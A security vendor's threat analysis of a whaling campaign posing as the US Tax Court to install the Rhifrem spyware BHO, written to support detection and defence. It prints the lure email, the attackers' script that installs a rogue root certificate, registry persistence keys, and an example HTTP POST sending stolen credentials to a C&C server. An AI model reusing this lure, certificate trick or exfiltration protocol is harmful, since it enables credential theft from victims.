0 Results Found
            Back To Results
              Threat Analysis

              Tax Court Phishing/Whaling Emails Used to Install Spyware

              Executive Summary

              A new wave of "whaling" emails pretending to be from the United States Tax Court attempt to convince targets to install a spyware Trojan known as Rhifrem.  Whaling is the term for phishing messages targeted at "big fish" such as C-level executives.

              Analysis

              The target receives an e-mail message pretending to be from the United States Tax Court.  The From field in the message is missing an 's' on the word "States":

              From: United State Tax Court <notice@ustaxcourt.org>

              The Subject field includes what is referred to in the message as a docket number:

              Subject: Notice of Deficiency #62-84989-711420-788

              The message uses the name and brand of the United States Tax Court and reads:

              Docket No. 62-84989-711420-788. Filed May, 2008.

              Issued by the
              UNITED STATES TAX COURT
              Washington, DC 20217

              Commissioner of Internal Revenue
              Petitioner.

              versus

              Jon Doe, CEO
              Business Name
              555-212-1234
              Respondent.

              PETITION

              The Petitioner hereby petitions for a redetermination of forth by the Commissioner of Internal Revenue in his notice of deficiency (AP:FE:BOS:JHK) dated May 4, 2008

              Please click here to download a Copy of the Order, Letter, Notice or Other Document Being Appealed

              This matter is before the Court on respondent.s Motion for Summary Judgment, filed May 10, 2006, and respondent.s Motion for Penalty under I.R.C. Section 6673, also filed May 10, 2006. As motions, without prejudice, and remand this case to respondent.s Office of Appeals.

              Respectfully submitted,

              Bennett H. Klein
              Tax Court Bar No KB0214
              400 Second Street, N.W.,
              Washington, D.C. 20217.

              Notice the use of periods where apostrophes should be in each instance of "respondent.s" in the email body.

              The text "Please click here to download a Copy of the Order, Letter, Notice or Other Document Being Appealed" is a hyperlink to (link intentionally defanged):

              hxxp://www.ustax-courts.com/ViewCase.php?nr=62-84989-711420-788

              The number in the URL matches the number in the subject and body of the message and may vary.  The number parameter in the URL is not required for the scam to work.  It's purely informational, and is used by the attackers to see which targets actually visited the page.  It is not used to correlate stolen data to targets, and the server does not limit downloads based previous use of the same number.
               
              The real domain of the United States Tax Court is "ustaxcourt.gov" and not those (ustax-courts.com and ustaxcourt.org) used in this message.  Even though it might lend an air of credibility to the message, the attackers probably chose not use the real domain name in the From field because they did not want replies going back the U.S. Tax Court's actual servers where it might prompt an alert so early in the scam's timeline.  Such an early warning could have negatively impacted distribution of the whaling messages by giving anti-spam solution providers time to update signatures.

              At the time of the attack, the domain used by the attackers, ustax-courts.com, resolved to 221.195.42.67, a virtual hosting server in IP address space administered by China Network Communications Group in Beijing.  DNS for the domain was provided by "4everdns" nameservers in Beijing and Shanghai.

              Upon clicking the link, the page loads from the attacker's server and uses JavaScript to check the User-Agent HTTP header.

                  function BrowserOK() { ret=(navigator.appName.indexOf("Microsoft")!=-1); return(ret) }
                  function SetMsg()
                  {
                    var div=document.getElementById("msg");
                    if(BrowserOK()) { div.innerHTML="<iframe src='body.php?case=' width='100%' height='100%' frameborder='0'></iframe>"; }
                    else { div.innerHTML="<br>This website requires Microsoft Internet Explorer, version 5.5 or better...

              If it doesn't detect Internet Explorer, the user receives a message that IE is required and even provides a download link.

              If the user is using Internet Explorer, JavaScript is used to create an IFRAME with the content loaded from body.php on the same server.

              The body.php page uses JavaScript to install a certificate for a root CA (certificate authority) pretending to be "VeriSign Trust Network".

                credentials="MIIGIDCCBAigAwIBAgIBADANBgkqhkiG9w0BAQQFADBtMQswCQYDVQQGEwJV...

                On Error Resume Next
                Dim Enroll

                Set Enroll=CreateObject("CEnroll.CEnroll.2")
                if((Err.Number=438) OR (Err.Number=429)) Then
                  Err.Clear
                  Set Enroll=CreateObject("CEnroll.CEnroll.1")
                End If

                if Err.Number<>0 then
                    document.write("<font color=#0D7C99 size=4>Error installing the Trusted Content digital certificate from 'Verisign Trust Network'.</font>")
                Else
                  Call Enroll.InstallPKCS7(credentials)
                  If err.Number<>0 then
                    document.write("<font color=#0D7C99 size=4>Error installing the Trusted Content digital certificate from 'Verisign Trust Network'.<br>Click <a href='?'>here</a>, or press the refresh button of your browser to install the digital certificate.</font>")
                  Else
                    window.location = "active.php"
                  End if
                End If

              End sub

              "VeriSign Trust Network" is the same name used by some legitimate VeriSign certificates. This is a simple camouflage attempt. However, VeriSign did not issue this certificate. It clearly lacks some of the information and features found in legitimate VeriSign certificates.

              The user receives multiple warnings when attempting to install and trust the certificate:

              If the certificate installation is successful, the user is redirected to active.php on the same server.  The active.php page attempts to install an ActiveX control.  The ActiveX control comes packaged as a Microsoft CAB file.  The CAB file is signed with a certificate fraudulently using the name Adobe Systems Incorporated, issued by the CA represented by the bogus VeriSign certificate.

              Internet Explorer can be configured to automatically install and run ActiveX code signed using trusted certificates.  Because the bogus certificate is now trusted, the user may never see a prompt to install the ActiveX control, depending on current settings.  By default, however, the user will see a prompt to install the control:

              Once the ActiveX control is installed, Internet Explorer must be restarted:

              The CAB file contains two files, Acrobat.exe and Acrobat.inf, which are extracted to a default location (usually a Temp subdirectory).  The INF file is processed automatically.  It simply tells Windows to run the EXE file.  The EXE file is an installer for the Rhifrem Trojan, also known as Fireming, although it's usually detected by anti-virus generically as a malicious BHO (Browser Helper Object).

              The executable drops a copy of the BHO code as a hidden file about 53 KB in size:

              %windir%\system32\Acrobat.dll

              ... and registers the BHO with the operating system by creating a set of registry entries for Acrobat.dll:

              HKEY_CLASSES_ROOT\CLSID\{BD942DA7-96C8-4342-84C6-E2BCFE69FE11}\"Adobe Acrobat ActiveX Control"

              HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BD942DA7-96C8-4342-84C6-E2BCFE69FE11}

              The Trojan also creates the following registry keys from hard coded values in the executable:

              HKEY_LOCAL_MACHINE\SOFTWARE \Acrobat\1 = xxx.94.101.23

              HKEY_LOCAL_MACHINE\SOFTWARE \Acrobat\2 = 8

              HKEY_LOCAL_MACHINE\SOFTWARE \Acrobat\3 = /JJJ/parse.php

              The first is the IP address or hostname of the default C&C server, the second is the HTTP port used to communicate with it, and the third is the path to the C&C script which parses out requests and stolen data.

              Because each Rhifrem executable contains a hardcoded IP address for a C&C (command and control) server to be used in the attack, we know that the person who compiled the program is either the attacker or closely affiliated with the attacker(s).  In this case, the source code was compiled into an executable using the open source GNU C/C++ compiler distributed with MinGW (Minimalist GNU for Windows), a free lightweight POSIX environment for Windows.  The program was compiled by a user named "samo", or 金寶.  The use of the traditional (as opposed to simplified) Chinese characters indicates the author is not from mainland China, but perhaps from Taiwan or Hong Kong.

              After the victim re-launches Internet Explorer, the malicious "Rhifrem" BHO downloads the latest copy of itself from (link intentionally defanged):

              hxxp://xxx.6.202.56/cp/jj.exe

              ... and updates itself.

              The server at xxx.6.202.56 has been used in past Rhifrem attacks posing as an Adobe Shockwave Flash ActiveX control but which in reality targeting certain banking sites (those variants were also known as Banker.GMH and Banker.HYN) in June and December 2007.

              The Trojan then goes about its primary duty.  It attempts to read client certificates (such as those often used to access secure banking sites), cookies, stored passwords and other information from Internet Explorer (Windows) and Adobe Flash Player.

              As the victim uses Internet Explorer to surf the web, a log of visited web sites is sent to the C&C server.  A copy of everything the victim posts to a web site via a form -- SSL protected or not -- is also sent.

              Rhifrem sends the information it collects to its C&C server in another China Network Communications Group IP address range via an HTTP POST request like:

              POST http://xxx.94.101.23/JJJ/parse.php?mod=log&user=Alice HTTP/1.0
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 Gecko/20050212 Firefox/1.5.0.2
              Host: xxx.94.101.23
              Content-Length: 149
              Pragma: no-cache

              curr=https%3A%2F%2Fwww.hackmebank.com%2Flogin.asp&next=http%3A%2F%2F
              www.hackmebank.com%2Faccounthome%2F&post=username%3Dalice%26password%3Dopensesame

              The "mod=log" requests also use other parameters in the POST request body to send other stolen data related to the site the victim is visiting:

              • cook: stolen cookies
              • klog: keylogger data

              Cookies and keylogger information is only stolen for select URLs.

              Other "mod=" values include:

              • cmd: ask the C&C server for instructions
              • file: send file to C&C server

              If the reponse to the mod=cmd request is an HTTP 404 (Not Found) error, the Trojan simply carries out the default command which is an attempt to update itself.

              Files sent  can include any file, readable by the currently logged on user.  The files passwd123, KB0626395.log, or PFX files of exported certificates are created by the Trojan and contain stolen data.  They may also be sent to the attackers this way.

              The following is information regarding the server and ustax-courts.com domain name used to host the malware at the time of the attack (the registration name and addresses are assumed to be bogus):


              Location  = Beijing, China
              lat/lon   = 39.55n, 116.26e
              source    = NET whois.apnic.net
              type      = guess
              place-key = cn-beijing
              geo-key   = cn-beijing -> .\data\geo.vdb

              Node Name Table
              ===============
              Domain name: ustax-courts.com
              Registrant Contact:
                 lu zhixin
                 zhixin lu luzhixin@yahoo.com
                 0516-3114698 fax: 0516-3114698
                 peixianchengguangdajie236hao
                 peixian ngsu 221600
                 cn
              Administrative Contact:
                 zhixin lu luzhixin@yahoo.com
                 0516-3114698 fax: 0516-3114698
                 peixianchengguangdajie236hao
                 peixian ngsu 221600
                 cn
              Technical Contact:
                 zhixin lu luzhixin@yahoo.com
                 0516-3114698 fax: 0516-3114698
                 peixianchengguangdajie236hao
                 peixian ngsu 221600
                 cn
              Billing Contact:
                 zhixin lu luzhixin@yahoo.com
                 0516-3114698 fax: 0516-3114698
                 peixianchengguangdajie236hao
                 peixian ngsu 221600
                 cn
              DNS:
              ns1.4everdns.com
              ns2.4everdns.com
              Created: 2008-05-14
              Expires: 2009-05-14

              Network Table
              =============
              CNCGROUP Hebei Province Network
              inetnum:      221.192.0.0 - 221.195.255.255
              netname:      CNCGROUP-HE
              descr:        CNCGROUP Hebei Province Network
              descr:        China Network Communications Group Corporation
              descr:        No.156,Fu-Xing-Men-Nei Street,
              descr:        Beijing 100031
              country:      CN
              admin-c:      CH455-AP
              tech-c:       KL984-AP
              remarks:      service provider
              mnt-by:       APNIC-HM
              mnt-lower:    MAINT-CNCGROUP-HE
              mnt-routes:   MAINT-CNCGROUP-RR
              status:       ALLOCATED PORTABLE
              remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
              remarks:      This object can only be updated by APNIC hostmasters.
              remarks:      To update this object, please contact APNIC
              remarks:      hostmasters and include your organisation's account
              remarks:      name in the subject line.
              remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
              changed:      hm-changed@apnic.net 20040329
              changed:      hm-changed@apnic.net 20060124
              changed:      hm-changed@apnic.net 20060125
              changed:      hm-changed@apnic.net 20080314
              source:       APNIC

              As of the initial release of this analysis, virus detection of various updates to the Rhifrem Trojan breaks down like this:

              Filename

              Number of 32 VirusTotal participants who detected the file as a threat

              Acrobat.cab

              20

              Acrobat.dll

              12

              jj.exe

              5

               

              Solution

              Use a browser that supports anti-phishing technology.  This will alert users to suspected phishing sites and other website forgeries.

               

              In the case of malicious BHOs such as this, use of a browser other than Internet Explorer will prevent the attacker's JavaScript from attempting to install both the certificate and the BHO.  If somehow installed manually, the BHO cannot steal information and send it to the attacker's C&C server unless the victim uses Internet Explorer.

              Do not install certificates from web sites, even if the name matches a CA you trust.

              Do not allow signed ActiveX controls to be installed without prompting, even if they appear to come from a publisher that is trusted.

              The initial CAB file used to install the Trojan from the link in the whaling messages is detected by the majority of engines from major anti-virus vendors, and more are sure to add a signature for these versions of the Trojan in the coming hours and days.  Update AV signatures at the gateway and host.  It will be detected variously as:

              • DlRhiFrem.A
              • Fireming.E
              • BHO.hn
              • BHO.hp
              • Agent.NFV
              • Dwnldr-HCM
              • Trojan.Dropper
              • Backdoor.Trojan (a generic misclassification)

              Update anti-spam solutions and blocklists to prevent delivery of the email message to the target.

              Make sure web filtering and IDS/IPS solutions have updated signatures that can detect/block Trojan activity.

              Related Content